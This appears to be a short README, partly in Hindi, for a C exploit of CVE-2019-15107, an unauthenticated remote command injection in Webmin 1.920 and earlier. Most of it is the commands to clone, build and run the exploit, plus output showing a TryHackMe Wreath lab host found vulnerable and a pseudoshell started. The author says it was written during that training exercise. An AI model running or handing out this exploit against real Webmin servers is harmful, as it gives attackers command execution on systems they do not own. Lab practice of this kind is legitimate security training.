
CVE-2019-15107 Webmin एक्सप्लॉइट C में
एक समस्या Webmin <=1.920 में पाई गई। password_change.cgi में old पैरामीटर में कमांड इंजेक्शन की कमजोरी है। [NVD]
$ git clone https://github.com/whokilleddb/CVE-2019-15107
$ cd CVE-2019-15107
$ make
$ ./exploit http://thomaswreath.thm:10000
[+] CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
[+] Target URI: http://thomaswreath.thm:10000
======Headers======
HTTP/1.0 200 Document follows
Server: MiniServ/1.890
Date: Sat, 14 Aug 2021 23:40:01 GMT
Content-type: text/html; Charset=iso-8859-1
Connection: close
[~] The Given Server Is Running In SSL MODE
[+] Switching To SSL
[+] The Given Server Might Be Vulnerable To CVE-2019-15107
[+] The Given Server IS VULNERABLE To CVE-2019-15107
[+] Starting Pseudoshell
[+] Maximum Command Length(CMD_SIZE) Is Set To: 2048
[+] To Exit, type: exit()
नोट: यह एक्सप्लॉइट TryHackMe's Wreath Network को आज़माने के दौरान बनाया गया था, इसलिए यहाँ दिखाया गया उदाहरण उस बॉक्स के अनुरूप है।
प्रश्न : C क्यों, Python3 क्यों नहीं?
उत्तर : क्योंकि मैं एक मनोरोगी हूँ